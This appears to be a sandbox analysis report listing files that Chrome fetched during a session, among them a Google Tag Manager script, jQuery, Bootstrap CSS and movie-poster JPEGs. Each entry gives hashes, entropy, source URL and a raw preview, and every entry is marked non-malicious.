                                                                                                                                                                                          SHA-256:EB7256DCCA4BF602E329818D37FE398BD61F9E93E43AB0567407DFCB98997ACD
                                                                                                                                                                                          SHA-512:5CF1AB897759A1C1ECC2894B8AC5AD24C8F678BDBAB0EFD5C38A803BD5B2567C20FB06194FEFAA1FE37FF4509703A7D8FFCF58E10A90FB0A0132A7C1E65D2E55
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=UA-135929476-2
                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"}],. "tags":[{"function":"__rep","vtp_containerId":"UA-135929476-2","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","G-RYBM6VWWHG"]],"vtp_enableConfiguration":false,"tag_id":3}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0,1]]].},."runtime":[ [50,"__c",[46,"a"],[36,[17,[15,"a"],"value"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__c":{"2":true,"4":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__c":{}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__c".,."__e"..]...}....};.....var h,aa=function(a){var b=0;
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (2310)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):218046
                                                                                                                                                                                          Entropy (8bit):5.536180527917595
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:ISFitgcnsmIjt+D0izmYasxzuZ1IwPcRCrhaPhka0Mf3/MVpm9VM1:fYnsmQZZ1HcRCrva0Mf3/MVr
                                                                                                                                                                                          MD5:EC96060595BCD2B5D14D1EE284E1CD88
                                                                                                                                                                                          SHA1:413C79B2341565AFC6AFA80CFFBC5C1606DD44C2
                                                                                                                                                                                          SHA-256:990E242E6C559174DAE9F2A2911D9BC847FA9278329925D898E67827254B818F
                                                                                                                                                                                          SHA-512:0CC7379ABB273651624BAA8BAA8A7B3AC24C83DFC697A272A5D357C644470B942C5A702DFF2BE2735CA35CECA628D3671DBB592F16F532D59EF11694017D266F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"}],. "tags":[{"function":"__rep","vtp_containerId":"UA-135929476-2","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","G-RYBM6VWWHG"]],"vtp_enableConfiguration":false,"tag_id":3}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0,1]]].},."runtime":[ [50,"__c",[46,"a"],[36,[17,[15,"a"],"value"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__c":{"2":true,"4":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__c":{}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__c".,."__e"..]...}....};.....var h,aa=function(a){var b=0;
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):38064
                                                                                                                                                                                          Entropy (8bit):7.981079567930447
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:pEC1D6L6/57IJgJU8ReOLHg9cYYJX7WQ7RQoUsZhjKLdFcRNRT:pEC1Dd7IYdReLcYYJLvQTNLjYZ
                                                                                                                                                                                          MD5:9128AB63CB5441FEF5FD249091E205E3
                                                                                                                                                                                          SHA1:A5625A532380F5F204368480B7DCB97360D19039
                                                                                                                                                                                          SHA-256:A5D0A9E75849202DFD7D765E7CB9E0A5C3191C301BB3642CC28ED24F0A168E02
                                                                                                                                                                                          SHA-512:404994E0CCB0596429F4439642E8862C70A89D76A1E51F4847623BBC3B5A9F501CB41A1B0AB452DCC0AD8F699672B15A77ED6C48311E30FEB10B9F4B39A3B85E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNWE4OTNiM2ItMjY4Ni00ZTViLWFiZmEtZGEyNGY2ZmNlMzIyXkEyXkFqcGdeQXVyMDU5NDcxNw@@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6......................................................................P.q..a......9.P.a..0..z......|..p.%........P6.nh............jz..r..E.....?.iU?5j.Sa\...h..G1..H..................).L.r.\X..,.E.L.d\t.I.B...7Z...a.....|y........g...X.............wj....'......2.].tii.?.6..}...^.x..9.......}2<G.=..b|.,u.i..h...........?..r.'..*.s..].tj..k....S.U....~^.Cy.@wKB-.7..)>o...'..?x.....J...`.........q.k.n.W.]..A.F....L..Q.e.<....:....z6.m..T\%...&..a..7..}..9@.........y.....].S.t.~...Z..$.{...z.2..A.h...KP..A...!........O...|.>&.....}...0..q......z..~.......zn.#_..~.;.s+..r,.'.Z....y..4e...2....,4\.uk........hr.P.}1./............U.O.o...H....s...j.q..n....(.L....q.......VBa.n...L...w..n.,.*K0.p..h..;.+..`..@....8..}..^...w.4W...a......O.}..kS...a..O.{.e.l..<.m...n...^n..-N.....K...u
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x470, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):48830
                                                                                                                                                                                          Entropy (8bit):7.9879209606163935
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:EL++JS6RVyzuLHyO9TNt8UwKTShsOJlxi3OP2B6rgz5PrJB5reAk0E3Rl+YfmH+y:O5IuLhlxTSh9JXi32DMFj5NKtfmeXCKY
                                                                                                                                                                                          MD5:DCECC9A3BF2A5F55DB70B8CAD36AABBC
                                                                                                                                                                                          SHA1:A5ED4B1AB89EF6711B3F829B93EA3130D41A038D
                                                                                                                                                                                          SHA-256:8580D0907756EAFFF97B90DC94A2187057A6D16C1E19ED1028227018F3B77FF6
                                                                                                                                                                                          SHA-512:50EF384C9795A65D8C3B05C08F0F9F34B5A24EAB3090C2E504CE2CCB2FEBE23F823CE851B1F40621AEAD4FADDB3AB87B75EA3CACCCA6A291E63C4072896F5A77
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................u~.a...z.6.G.kKC...........L...-0.P...gH.....-.J...7e.b..V..I.#u....)....?.u...V.UY...Gt..*T...u...A^4.e.....Q>.G.p .ej...1.'..!mE......`.2C..|..A.<.{.-.n.n*J..].J..........."V!<...*-.&.q...5..g....Bj4...Zb.r.n...T...[..]L.{]4-.........%....Z...h..:i...b.7Y...}..p......4Kd\v.<..O....f.tz/...S...5.e.Nn.tV....Q.K....p..._.P..KKk...Q\(...8MH.j.*.._..>..>....GBn..5....=..*.m.!.|.....kP..8..\.*..Q......{>.n..;&.k.0.Iu9....Uk(..H...%.....9.....e.w@.jh.3..q..n..|.s1....I....8.9>.b...!..f.....=.....)..2..oE...zr..../9.q...g.6.&..G.v.2..Atd.IT.9.`..~.Y.R.....=).B..&R..+..GN.s....*.....E.....XoM.aX|,..s...-.Rz..].2.?k(.v1..r...Id..p....#.....:.s.*E..2.........K*...N...Fx.J.d...L.tc2T.....).....(..A.L.........=.z
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x455, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):34350
                                                                                                                                                                                          Entropy (8bit):7.984283175337866
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:yAYsjoUNl7+89yx6YeiDRq4vXl40OFybrXE0VUji0mKdc8TQVo:yAY49X9yx6YLRq4ISrU0VUOacKQ2
                                                                                                                                                                                          MD5:A4A2E0D0207193E2A9D753013E602792
                                                                                                                                                                                          SHA1:4FF61DB9EF88B14B77390A5145C97C85D50BA13A
                                                                                                                                                                                          SHA-256:B7C695555F23160C39C485B76D1786217514DA460C8279479434D6548CD8B5D5
                                                                                                                                                                                          SHA-512:046F0B4F7DC48A689829C6F61AEF3698B97489F33F0806B075010976EFA0172B38B767EC835F8D076028D21B9E9A43F958A9E7DE5E0CF91B95D422C43E95C02A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................Z..j......o..O ..#.={..6..vK.ry4.d.[...../%=j.._D..k`i..::".....u.`bn..d&n-...E7...v....si.o.!UQ.Md6.f.yf..|p...~l.....M..n.Q.6..=...J{.8.|..6......Un.D....(Lr....,..U../.Dr...Uq...P..~]..G....P*..4tG.:y..-PL...n.m.i{+.Z.*}..{Nt.8trv..DE..DJ..w......E.4.C./.kq.>."....o....d.&&T#..T9..UlX.;..J.'r.d...Ku.G.....//.;.Q.e<.~V.K..y.e.Ff.>s....+.H,...c...`..g.7lF..&t.Q.v...^\..].'{2...'.S7..+...P......A7..-..D.X..J+...g.'AV.F.d.o.<.<N...y(0^.n..q....j>....y....R..b....[..}tN..?../\.....!.Y...Z..)R.......}z...,.X4...}..-vX...2.!.%vF..[..h.....Q...N.@$...U.nB..n....5.}..w.C].S..(?*v....-.nu.v.!....}..O...l.>s.i:.S....oa.....b.4.?...x..>.......z..wk....\..........T}.Z.>...q..DQ.8].%]A.*..mK"...:L..t.../..F-j.?.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):35043
                                                                                                                                                                                          Entropy (8bit):7.98624510579713
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:9RD+bZcjWSudGms6BfUh9j3GvQnDaSUwyZNJaizPRSA:9RDWZcj3wm6BfULkVZ5XJ/L/
                                                                                                                                                                                          MD5:2A534114CD20518C30D23E71999D5AD6
                                                                                                                                                                                          SHA1:8A1B635AE738DAD75CF5001CBBA69994BF11A5ED
                                                                                                                                                                                          SHA-256:9896729FFF0742581357370B0D363E8B1CB95BDEF5D60C0A57ACD647E6F3D12E
                                                                                                                                                                                          SHA-512:AF89F506BDD1A88CA771FAD16CC7AA95B1538A65690461557E43C565F385CB93230F29E10EEECBC4663A715F954D5B51E4799BF3F648101C1C2566741AC29132
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://images.fsharetv.co/jwjzcdhlaa.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}........,.."...................................................mU..f..-q.........)..h.KHl..c.c.k.}.{.._m...{..s...g.PGm...._g:c9...3.*..t..#v..m.3.i...=..5........^.r@...4K.<q.u...NHh...k..[z..*3FA...7....U^.AY..W..........ks.W4GW..9t.[...q..>s..&..^...(.....%..g..f!..S.~2..f;l.....J...P..\..Ta.}.....|Q.......]..".)}p.......a^.3...S.:.....]..). .2_.@~...x|....Xt..OA.m.\....U.1.*-.'|6....h.(..3.}..vgT.u....+I.5...mN.g..N...>4....]!...Ey..+...t..'......r..+|A.JE.+.n......J?..GU&...g1.......2...yGBd.Y..IVN.C.C.yX<-,..O..qMuH.. .%.d..B...Oa...\.OEd...X....u..>%i..J........;.U.xF.<.:..=."0Z1....Rt..\c..x.}^A...Ow....0.{li.8f....'4.{m}....|.wb.)l...W..1B..Q%..K.....h..U.] ./..A.l...8....n4|........R...D....g......G.......d3.2./.%c...,.]6y..X...W..!.''&.-.*.e..(....k0.;<QU6u...".^...r@.Jd.&.]..
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):37560
                                                                                                                                                                                          Entropy (8bit):7.986223907293676
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:Ll9N2II2B4mgBlFBQAYRiTykY3JsrS7r80CNwN9SuRCjbfVXO9bQ0J7PVOtKO:LlndyT2AYRiTu3lrww/RCjbdqXi/
                                                                                                                                                                                          MD5:C882C5D076B3773FAF70DE4445BF5DF5
                                                                                                                                                                                          SHA1:66F8A52B3B1DB229A711BD4FFD39656518584EAC
                                                                                                                                                                                          SHA-256:C10384D9EDC303F386D4276910C3540F088CE32661B009DFD9BBFA69F56CA7F1
                                                                                                                                                                                          SHA-512:F6D27B32259C3394E44717A4C01AF7B5F4EF43F9767EBF8F0F3E847AB8F5ADC5C79C9145499AD34F691624713D9B400F177EBC9063737AEF59F0E15995A04AC3
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6..................................................................K.cF7G'..~..3\j.[.V..>...$..=C...{"/...{..l.^....42J{....g.r..c......j.o.p..W..:UONg...e..m......qk7{A!...w.+.JgD.5...a........Gx......b*...+[.t...=`...6E./-......*-..[..Z..T.m...G\Zc%F..C.).3k&:%...V......(... .av..%...H..EM...%........Vg'L..'d&.t/#tF.B..%.....i.3.(+j....l%/.].2.1.....i;^......MuYdt..K".n.F'.U....O...M{........N.:e.;.5l.Z@GA$LP..T.n.nH....V3]9....r.B.#\...........w..W..o..*.Fw...nb:.F..k....R6.o(...............a..h.....qJ..?.....^R[:..c]m....^.....4...5,.....Xs...z.w...a.w..W.".-^....vxg...2..h.N.r.....j.(..M"..X...2.bc..F..o..R[.R..q..77.G..i8..x@.^F..3g).h....+._<X."<Mm./.y.s..].F>..'.r].....y....Y..b...m...?.+*..i+..vr__......@....X... U.i.aTk...${...,.N..I1..q&`..{..A..Z,.._..j*...^.W.>xI...X
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65335)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):232646
                                                                                                                                                                                          Entropy (8bit):4.984788207323618
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:Xa/tfXbf98fOdBfvO5wlP79y9A37onOHFsY/ElV6V6pz600I41K:itfL98fVnOHVI6V6pz600I41K
                                                                                                                                                                                          MD5:D9BDE5BCE258E06CF0FFEC0F2D6BE25B
                                                                                                                                                                                          SHA1:B1A4FE7231C3BACF1C9453AB4120C30CC10420FB
                                                                                                                                                                                          SHA-256:0C43A938A74D80194FC0E686D215306AA3F23970D66A5A9F1474F4940DFE91DA
                                                                                                                                                                                          SHA-512:E13C450834BEEDD11C4FA0A24C2B4D5E54D07499317564F0570B25FE0574F00332AE7F07B7E0514D5BF371FA71FD256C3B59DFC35C3696560F688C4DD1120B5A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://birthjeans.icu/templates/assets/s1/bootstrap.min.css
                                                                                                                                                                                          Preview:@charset "UTF-8";/*!. * Bootstrap v5.3.0-alpha3 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-r
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x446, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):32742
                                                                                                                                                                                          Entropy (8bit):7.981655162203221
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:73xTgaACo+aPIIkMhQ1GNeTnbE5JNmb+i1gGX40bB:FTo1+agIOMs/E57mbZ/XD1
                                                                                                                                                                                          MD5:9CA2D62DAA5148DA010FBF4CDAEFFFA1
                                                                                                                                                                                          SHA1:11AE12D2B6542FC171D62531809A067A5CCED6D0
                                                                                                                                                                                          SHA-256:873B44577A2D059E765514410547EB5B94D160659566CE1649850B2C14C4FC85
                                                                                                                                                                                          SHA-512:AA399D0383DC870424C1C6C0EF667CAF8009ED70738584575564FF82CE58FA2AD7EE08F9078B85D0E85B42B27782073F34DBD4A02CC2987720541D6FA00678C8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BOTQ1NmFjMzEtNTkxYS00ZjY5LTgxN2UtMWM0NTlkZjc4MzNmL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................,.|..33$....7|.>.l.Z..oQ.SA....D.4.5.B$K;...#....i..(.|...y.......O{n...V.t.V..5.V..W'z.....w.."..{........&.N..p.dNg.+..;.Y...~k..]A\.(........6.q3+F*.$..<F..r...A..v...12.q./......X.....sT.g.{....;..._l.Mu...!Ut...[+.z.aA'E.....:X...'...z.......j7Z..i6?..-..(DI+.......}4..e.}...,...z.c..u....B.....F..u.....N..`.V...0...Q..i......b..H..qV.....D..@Jf..1....u....^f..3$...dXn..]....`u.<....j.r..&$.vi.F.C.@........._+.$T&..gIkd?y.....7.3a.L_.z..MZ.f.33$.......B.1.Y[-._8h..@.GH.+...w...<..l#{..=.'7.4C...Vl:.....v.....O...TX."..f!.*.3*.3d....:.6......m.W........9y/.5....Y.xodSM.Q...^=.D....+!.i..V........ m.P.9...U.[.W....../&.*1(..,6*...c.d.C.p.....p..5....._6%....Sq.y...S:|m..@+]T.,W..3../........>....$]
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x459, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):31447
                                                                                                                                                                                          Entropy (8bit):7.9804203582999085
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:9INE7LMyXj6IIYYlxr5ATdXEBqXQJBlDiyLNseOPi5AxppE:mwNWIdGgTdXGqXQJZLNGq57
                                                                                                                                                                                          MD5:6F2557E62916A9EC8B10A0D02BDEE891
                                                                                                                                                                                          SHA1:A3E55038EBA1C1767D12195BF00BFEFDA9A1C499
                                                                                                                                                                                          SHA-256:1452298AB80B98707B125F6EDC981503698F9E3BCC10D0A1FAB90223B59D03DC
                                                                                                                                                                                          SHA-512:D593216DA60B82F9AAC7C6242DF67EB96775971A9CD6A08BE058CD45FCEEAA21DD21D13B6E5170F3C8E8A39FF7385725874070DB69FFF86F369B229141695E7F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5.....................................................................k.....|......|......|......|......|......|......|........\@J.............[X.N.7.&...P.....Z.n9-....a+../.=l.........OIC..D.7^.O...St....U.2.g....u....E.......bq..rM...,"a..q..f.xD.C......A"^LmL...$.@4 |V....Y.....a..W.2..1.,.J.O...wy.....s=......l.Y..........N`....8d.....A.........7`...@.7..PxE)..8.....S.......=.._.....R.K1.n..i.... vJF....j..K.=...F=..h!....x.H.].g....A..2m..H.[.....Y.]NW.XW..'}...hp.;Q.r.^m..Wm^..1.(.\..g...Cz..i.jh.!T...4.....t....V.X.a7..U...2...U..._......]NZ.^YG...j..N}....-.p.O4.?..uW~.*:....*5\.\...6.h.CZ..Y`..M..9.n}..l_Q..+._..]c.I...2..J......5..Nq...b..k..n..(..S.b..kk....j+).s.[...E......^2*4.....K.4kf.>Q+Iu.W#sV..by.u.......y}...]!..../.r...z...f..d.V.9...#Qt_..BI..Y
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x403, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):27912
                                                                                                                                                                                          Entropy (8bit):7.97930443375517
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:5DZLWSjuBH7ZptYrzNwgwdjvzBLBpzU0IcjVFNxKrXPJC5EiDVMMk8XeLs96P6cO:zRjs7ZpmhwlvzXlUYVrxUXBwFBn9S6cO
                                                                                                                                                                                          MD5:EF986115130BAD0586FE7636D0AE9FBE
                                                                                                                                                                                          SHA1:A85EAF4928C885CFE920E482879A2DE0F87E9C60
                                                                                                                                                                                          SHA-256:D08E11419ED328EA6FD8813DE385E23D3F08580B266D51FA87FFC11AE0817F44
                                                                                                                                                                                          SHA-512:59E5627648C1C8469226543004034D719CE1DD46A57D105F03B25A84C4F485CB120916711580FE6BC2341DC89F3E9FE348EF986A00943BBE5E9D2D252A15FD58
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................^..,...9.Y:3.u1n.u...z...)+5..XH..[f...jt^...K...1.....#%..ct....r.#.K.bX.I...:.H#...;a...*..E+.....5...ns..W.D&p.$....f..m.e.(...^.k.....~Rt.).h./...S..od%."O......./VJ.*x.1.....:U.......Kq.=9:X..j]1..l.......k-.v./f..;(.T>-0....X............G...b...%"ZC.u..A..$......rlu......>..|......(...7..W..S.\...*...L..4YC......S.Z.md....eQtr.I.S,0..K...x..\[.....N2...I.F...........^0m.......#.I..q.i.. ...F2..{..4GQ._......H.2I(.&...[..%../..3.3...p0.x`.......=..q.y...8>.g..a@<..eI.<6.z..;.Q.."..y.i.yzu.$@.....J.....)VF........j...F..{:5.....%.6..-....s_..[7)[\c.J.O.m........j..@r}+.-{.vx.'.......j5=K...+..rZ....>...Dyu..8....FE.,..w;...).^.....).?f&.}&.H.H..Q..6#.j....tUzQ7. C....:.k...!r...(g....W....A
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (32060)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):97362
                                                                                                                                                                                          Entropy (8bit):5.373609500169285
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:eYE1JVoiB9JqZdXXe2pD3PgoIK6alrUSTJWFk/zkZ4HWLZoHsrOa99fwk6b7/Hpu:V4KZ+S3WLZICOaLfwk67qD1PaUa98Hrn
                                                                                                                                                                                          MD5:CBB11B58473B2D672F4ED53ABBB67336
                                                                                                                                                                                          SHA1:66F47B885D587AA9A6C453AE3F2C9A382E5C7EC7
                                                                                                                                                                                          SHA-256:5F1AB65FE2AD6B381A1AE036716475BF78C9B2E309528CF22170C1DDEEFDDCBF
                                                                                                                                                                                          SHA-512:2BB663ECF1AC1E4D9FA58DC9C2F6EEA3D9CA739E353287C5AEB2DA5143BDCEA8219C9C5B677667DF95BF65E5EF6D3D91B52BA3C466F0F0F824AA9A195D76C687
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js
                                                                                                                                                                                          Preview:/*! jQuery v1.12.0 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.0",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.ca
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x421, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):50325
                                                                                                                                                                                          Entropy (8bit):7.988658539069268
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:+2Y8C4QrKoF6bbowZymCizITtKEGIVbw0UTW:pY8NQGHbbH8mbIW6U0GW
                                                                                                                                                                                          MD5:03670FC66FCA0FA087FCC6E6A37FC0A3
                                                                                                                                                                                          SHA1:9D704B6561300459A1F43ED719F710FCD00B8771
                                                                                                                                                                                          SHA-256:BC69D58F4A170D80A08C581BDFCA23EFBC02834AC86AF9ABD08CC54680A73E1D
                                                                                                                                                                                          SHA-512:A0D8252C51838F7A59345C454433EA5075457138614E1A3AC2F550F32BAFA32BD6394D874FED8661814EECA27CFA407A9A5BDEDA359480C27A3D2EE2085A163C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................\-........=..d..6.i.}.~f.QFF......\...Z...)...V......./..}}KI...a..j..d.lH``nKd.."G......cs.....Y...>...>..YZ:...$.n..FS4..\].M..J.s.....!5..G.c.m.k.....@...m....i.][LP.)...0N....~....*............!.....er..'..R.".4].J/.......i.$.~......7)..\R..%...C......x...WAvn.u.F _.."4e..&.gK.M7.).{sH...^r.....I=}.......R..S.v....H..7.R~....J:..R.A.7...w.m.>..@..~...c+s.{..X.....m~..G}.}.....f|..f..d...Y.".^,.C..e.df...;:..B?:.'.t....$.N....>..3.....y..^ ..cWK.#g.a....@.(}...@j..remG.fo.F..MT.b5...........#eb.6....=...j..;.egI.y+`..7!*.+HB...mJ....h.L7;....em.u.......{X~.Lm..\>.s..\}J.\....X...#...v.D5&q.....=x..6.)).Vy...c.1...ZL1*....%h.Y....-*z?.u..K`...&..~hM..m.jU..~W.~Y.[..92>Fg.Am.!..|.n<..f...3.M...h.2.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
